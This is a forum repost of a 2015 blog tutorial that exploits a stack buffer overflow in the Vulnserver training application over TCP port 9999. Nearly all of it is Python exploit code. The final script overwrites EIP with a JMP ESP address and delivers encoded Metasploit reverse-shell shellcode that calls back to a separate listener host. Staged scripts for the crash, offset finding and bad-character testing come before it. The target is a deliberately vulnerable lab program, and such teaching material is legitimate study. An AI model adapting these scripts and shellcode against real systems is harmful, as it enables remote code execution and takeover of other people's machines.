Jump to content
Nytro

Exploiting Buffer Overflows

Recommended Posts

Posted

Exploiting Buffer Overflows

Posted by cyberkryption on February 14, 2015

Recently, at the Digital jersey Open Source event, I gave a talk on exploiting a buffer overflow. I used win 7 as a host for the vulnerable Vulnserver application which you can get from the Grey Corner bloghere.

The presentation is here, some of the videos are missing. The videos were only a backup if the live demo ran into issues.

The final exploit code is shown below, with the steps to achieve it shown afterwards

Final Exploit Code

[TABLE=width: 917]

[TR]

[TD=class: gutter]

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

[/TD]

[TD=class: code]</pre></pre>

<pre>#!/usr/bin/python

import socket

server = '192.168.43.12'

port = 9999

prefix = 'A' * 2006

eip = '\xAF\x11\x50\x62'

nopsled = '\x90' * 16

#msfpayload windows/shell_reverse_tcp LHOST=192.168.43.213 LPORT=443 EXITFUNC=thread R | msfencode -b '\x00' -e x86/shikata_ga_nai

exploit = (

"\xbb\x7d\x25\x14\xae\xda\xc0\xd9\x74\x24\xf4\x5e\x 33\xc9" +

"\xb1\x52\x31\x5e\x12\x03\x5e\x12\x83\x93\xd9\xf6\x 5b\x97" +

"\xca\x75\xa3\x67\x0b\x1a\x2d\x82\x3a\x1a\x49\xc7\x 6d\xaa" +

"\x19\x85\x81\x41\x4f\x3d\x11\x27\x58\x32\x92\x82\x be\x7d" +

"\x23\xbe\x83\x1c\xa7\xbd\xd7\xfe\x96\x0d\x2a\xff\x df\x70" +

"\xc7\xad\x88\xff\x7a\x41\xbc\x4a\x47\xea\x8e\x5b\x cf\x0f" +

"\x46\x5d\xfe\x9e\xdc\x04\x20\x21\x30\x3d\x69\x39\x 55\x78" +

"\x23\xb2\xad\xf6\xb2\x12\xfc\xf7\x19\x5b\x30\x0a\x 63\x9c" +

"\xf7\xf5\x16\xd4\x0b\x8b\x20\x23\x71\x57\xa4\xb7\x d1\x1c" +

"\x1e\x13\xe3\xf1\xf9\xd0\xef\xbe\x8e\xbe\xf3\x41\x 42\xb5" +

"\x08\xc9\x65\x19\x99\x89\x41\xbd\xc1\x4a\xeb\xe4\x af\x3d" +

"\x14\xf6\x0f\xe1\xb0\x7d\xbd\xf6\xc8\xdc\xaa\x3b\x e1\xde" +

"\x2a\x54\x72\xad\x18\xfb\x28\x39\x11\x74\xf7\xbe\x 56\xaf" +

"\x4f\x50\xa9\x50\xb0\x79\x6e\x04\xe0\x11\x47\x25\x 6b\xe1" +

"\x68\xf0\x3c\xb1\xc6\xab\xfc\x61\xa7\x1b\x95\x6b\x 28\x43" +

"\x85\x94\xe2\xec\x2c\x6f\x65\xd3\x19\x44\xa0\xbb\x 5b\x9a" +

"\x4b\x87\xd5\x7c\x21\xe7\xb3\xd7\xde\x9e\x99\xa3\x 7f\x5e" +

"\x34\xce\x40\xd4\xbb\x2f\x0e\x1d\xb1\x23\xe7\xed\x 8c\x19" +

"\xae\xf2\x3a\x35\x2c\x60\xa1\xc5\x3b\x99\x7e\x92\x 6c\x6f" +

"\x77\x76\x81\xd6\x21\x64\x58\x8e\x0a\x2c\x87\x73\x 94\xad" +

"\x4a\xcf\xb2\xbd\x92\xd0\xfe\xe9\x4a\x87\xa8\x47\x 2d\x71" +

"\x1b\x31\xe7\x2e\xf5\xd5\x7e\x1d\xc6\xa3\x7e\x48\x b0\x4b" +

"\xce\x25\x85\x74\xff\xa1\x01\x0d\x1d\x52\xed\xc4\x a5\x72" +

"\x0c\xcc\xd3\x1a\x89\x85\x59\x47\x2a\x70\x9d\x7e\x a9\x70" +

"\x5e\x85\xb1\xf1\x5b\xc1\x75\xea\x11\x5a\x10\x0c\x 85\x5b" +

"\x31"

)

brk = '\xcc'

padding = 'F' * (3000 - 2006 - 4 - 16 - 1)

attack = prefix + eip + nopsled + exploit + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect = s.connect((server, port))

print s.recv(1024)

print "Sending Evil Buffer to TRUN "

s.send(('TRUN .' + attack + '\r\n'))

print s.recv(1024)

s.send('EXIT\r\n')

print s.recv(1024)

s.close()

<pre>[/TD]

[/TR]

[/TABLE]

The stages of code used to achieve remote code execution are shown below.

Code 1 – Initial Crash

[TABLE=width: 549]

[TR]

[TD=class: gutter]

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

[/TD]

[TD=class: code]</pre>

#!/usr/bin/python

import socket

server = '192.168.43.12'

port = 9999

length = int(raw_input('Length of attack: '))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect = s.connect((server, port))

print s.recv(1024)

print "Sending attack length ", length, ' to TRUN .'

attack = 'A' * length

s.send(('TRUN .' + attack + '\r\n'))

print s.recv(1024)

s.send('EXIT\r\n')

print s.recv(1024)

s.close()

<pre>[/TD]

[/TR]

[/TABLE]

Code 2 – Cyclic Pattern to locate EIP

[TABLE=width: 19925]

[TR]

[TD=class: gutter]

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

[/TD]

[TD=class: code]</pre>

#!/usr/bin/python

import socket

server = '192.168.43.12'

port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect = s.connect((server, port))

print s.recv(1024)

print "Sending Evil Buffer to TRUN ."

attack = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab 6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A d3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9 Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag 6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A i3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9 Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al 6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A n3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9 Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq 6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2A s3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9 Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av 6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A x3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9 Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba 6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2B c3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9 Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf 6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B h3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9 Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk 6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2B m3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9 Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp 6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B r3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9 Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu 6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2B w3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9 By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz 6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2C b3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9 Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce 6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2C g3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9 Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj 6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2C l3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9 Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co 6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2C q3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9 Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct 6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2C v3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9 Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy 6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2D a3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9 Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd 6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D f3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9 Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di 6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2D k3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9 Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn 6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2D p3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9 Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds 6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2D u3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"

s.send(('TRUN .' + attack + '\r\n'))

print s.recv(1024)

s.send('EXIT\r\n')

print s.recv(1024)

s.close()

<pre>[/TD]

[/TR]

[/TABLE]

Code 3 – Convert.sh used to convert Hex to ASCII

[TABLE=width: 549]

[TR]

[TD=class: gutter]

1

2

3

4

5

6

7

[/TD]

[TD=class: code]</pre>

TESTDATA=$(echo '0x38.0x43.0x6F.0x39' | tr '.' ' ')

for c in $TESTDATA; do

echo $c | xxd -r

done

echo ""</pre>

<pre><pre>[/TD]

[/TR]

[/TABLE]

Code 4 - Confirm EIP location in Buffer

[TABLE=width: 549]

[TR]

[TD=class: gutter]

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

[/TD]

[TD=class: code]</pre>

#!/usr/bin/python

import socket

server = '192.168.43.12'

sport = 9999

prefix = 'A' * 2006

eip = 'BBBB'

padding = 'F' * (3000 - 2006 - 4)

attack = prefix + eip + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect = s.connect((server, sport))

print s.recv(1024)

print "Sending Buffer to TRUN "

s.send(('TRUN .' + attack + '\r\n'))

print s.recv(1024)

s.send('EXIT\r\n')

print s.recv(1024)

s.close()

</pre>

<pre><pre>[/TD]

[/TR]

[/TABLE]

Code 5 - Confirming JMP ESP

[TABLE=width: 549]

[TR]

[TD=class: gutter]

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

[/TD]

[TD=class: code]</pre></pre>

<pre>#!/usr/bin/python

import socket

server = '192.168.43.12'

port = 9999

prefix = 'A' * 2006

eip = '\xAF\x11\x50\x62'

nopsled = '\x90' * 16

brk = '\xcc'

padding = 'F' * (3000 - 2006 - 4 - 16 - 1)

attack = prefix + eip + nopsled + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect = s.connect((server, port))

print s.recv(1024)

print "Sending Evil Buffer to TRUN "

s.send(('TRUN .' + attack + '\r\n'))

print s.recv(1024)

s.send('EXIT\r\n')

print s.recv(1024)

s.close()

</pre>

<pre><pre>[/TD]

[/TR]

[/TABLE]

Code 6 - Bad Characters

[TABLE=width: 944]

[TR]

[TD=class: gutter]

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

[/TD]

[TD=class: code]</pre></pre>

<pre>#!/usr/bin/python

import socket

server = '192.168.43.12'

port = 9999

prefix = 'A' * 2006

eip = '\x42\x42\x42\x42'

nopsled = '\x90' * 16

badchars = (

"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x 0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19 \x1a\x1b\x1c\x1d\x1e\x1f"

"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x 2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38 \x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"

"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x 4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59 \x5a\x5b\x5c\x5d\x5e\x5f"

"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x 6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78 \x79\x7a\x7b\x7c\x7d\x7e\x7f"

"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x 8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98 \x99\x9a\x9b\x9c\x9d\x9e\x9f"

"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\x ac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8 \xb9\xba\xbb\xbc\xbd\xbe\xbf"

"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\x cc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8 \xd9\xda\xdb\xdc\xdd\xde\xdf"

"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\x ec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8 \xf9\xfa\xfb\xfc\xfd\xfe\xff"

)

brk = '\xcc'

padding = 'F' * (3000 - 2006 - 4 - 16 - 1)

attack = prefix + eip + nopsled + badchars + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect = s.connect((server, port))

print s.recv(1024)

print "Sending Evil Buffer to TRUN "

s.send(('TRUN .' + attack + '\r\n'))

print s.recv(1024)

s.send('EXIT\r\n')

print s.recv(1024)

s.close()

</pre>

<pre><pre>[/TD]

[/TR]

[/TABLE]

That’s All Folks….!

Sursa: https://cyberkryption.wordpress.com/2015/02/14/exploiting-buffer-overflows/

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...